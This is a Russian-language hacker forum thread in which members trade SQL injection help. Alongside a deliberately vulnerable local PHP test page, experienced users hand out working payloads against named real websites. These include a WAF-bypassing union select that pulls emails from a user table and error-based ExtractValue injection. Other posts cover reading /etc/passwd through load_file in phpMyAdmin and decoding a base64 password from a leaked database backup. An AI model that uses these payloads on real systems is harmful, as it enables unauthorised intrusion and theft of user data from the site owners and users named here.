Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. postscripter

    postscripter New Member

    Joined:
    25 Aug 2012
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Konqi, благодарствую, счас погляжу :)
     
  2. postscripter

    postscripter New Member

    Joined:
    25 Aug 2012
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Хм, но update или delete таким способом всё равно не сделать нельзя....... вроде близко бутерброд, а не укусишь)

    Пробовал через скрипт регистрации пользователей, там емейл экранируется только апострофами. Но! Cначала делается select, а только потом запись... и валится на select-е, а не на записи...
     
    #21242 postscripter, 20 Oct 2012
    Last edited: 20 Oct 2012
  3. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Только изучаю SQL Inj. Создал на локалке уязвимый php
    PHP:
    <?php

    $link 
    mysql_connect("localhost""root""");

    mysql_select_db("site");

    if (!isset(
    $_GET['id'])) {

    $result=mysql_query("SELECT * FROM news");

    while (
    $line mysql_fetch_array($resultMYSQL_ASSOC)) {

    print 
    "<a href='mynews.php?id=".$line['id']."'>Новость №".$line['id']."</a><br>";

    }

    exit;

    }

    $query "SELECT text FROM news WHERE id=".$_GET['id'];

     
    $result mysql_query($query);

    print 
    "<table>";

        while (
    $line mysql_fetch_array($resultMYSQL_ASSOC)) {

            print 
    "<tr>";

            foreach (
    $line as $col_value) {

                print 
    "<td>$col_value</td>";

            }

            print 
    "</tr>";

        }

        print 
    "</table>";

        
    mysql_free_result($result);

        
    mysql_close($link);
     
    ?>
    При запросе http://localhost/mynews.php?id=1' вылетает скуля.
    Ради интереса сделал такой запрос http://localhost/mynews.php?id=1; SELECT text FROM news WHERE id=2
    В результате облом, хотя если сделать запрос через консоль SELECT text FROM news WHERE id=1; SELECT text FROM news WHERE id=2; то все ок. В чем проблема?
     
  4. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    mysql_query не поддерживает мультизапросы
     
    _________________________
  5. postscripter

    postscripter New Member

    Joined:
    25 Aug 2012
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Подскажите, есть способы обхода такой вот защиты от инжектирования?

    http://www.karyera.kz/article_01.php?p_ArticleID=19%20or%201=1

    http://www.karyera.kz/article_01.php?p_ArticleID=19 and 0 union select null,null,null,null,email,null from tbl_person
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://www.karyera.kz/article_01.php?p_ArticleID=19+and+0+union(select+1,email,3,4,5,6+/*!from*/+tbl_person)--+
     
    _________________________
  7. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    А почему в данном случае select не попадает под фильтр?
     
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    потому что ваф фильтрует связку "union+select"
     
    _________________________
  9. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g-
    '.html
    Не могу раскрутить. Помогите плиз
     
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3a,version())))='1.html
     
    _________________________
  11. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    А что делает функция ExtractValue () ?
     
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://dev.mysql.com/doc/refman/5.1/en/xml-functions.html#function_extractvalue

    подобными вопросами в гугл, не флудим в теме
     
    _________________________
  13. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    http://vk.com/id1'+union+select+1,2,3+--+
    Подскажите как вывести все пароли? Что я делаю не так?
     
    _________________________
  14. Aplik

    Aplik New Member

    Joined:
    19 Oct 2012
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    В sql бекапе нашел следующую запись
    ('3','dsamir','dGVzdDEyMzQ=','miroslav@forge.com.ua','M','V','1',NULL,'3','2010-06-08 00:44:28','3','0','1','1','')

    dGVzdDEyMzQ= я так понимаю это пароль, но чем он зашифрован?

    Я только начинаю курить..
     
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    Кодировка base64
     
    _________________________
  16. Aplik

    Aplik New Member

    Joined:
    19 Oct 2012
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    спасибо
    жалко только пароль не подходит
     
  17. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    такой вопросец, получил доступ в phpmyadmin питался скачать файл etc/passwd, не выводит, пробую записать в таблицу, так


    чет вместо содержимого etc/passwd пишет его как строчку. как исправить?
     
    #21257 qaz, 20 Oct 2012
    Last edited: 20 Oct 2012
  18. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    912
    Likes Received:
    474
    Reputations:
    723
    Пробовал просто вывести?
    С кавычками играл?
     
    _________________________
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    епрст! ну сколько можно. когда наконец откроете гребанный учебник по MySQL?

    все что внутри кавычек - называется строкой
    вы пишите текст, потом удивляетесь

    insert into tbl (`wtf`) values ((select load_file('/etc/passwd')))
     
    _________________________
    1 person likes this.
  20. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Спасибо еще раз. Но дольше раскрутить не могу.
    Пробовал так _http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAME)from(INFORMATION_SCHEMA.TABLES))))='1.html
    Но выдает ошибку 406. Что можно сделать?
     
Loading...
Thread Status:
Not open for further replies.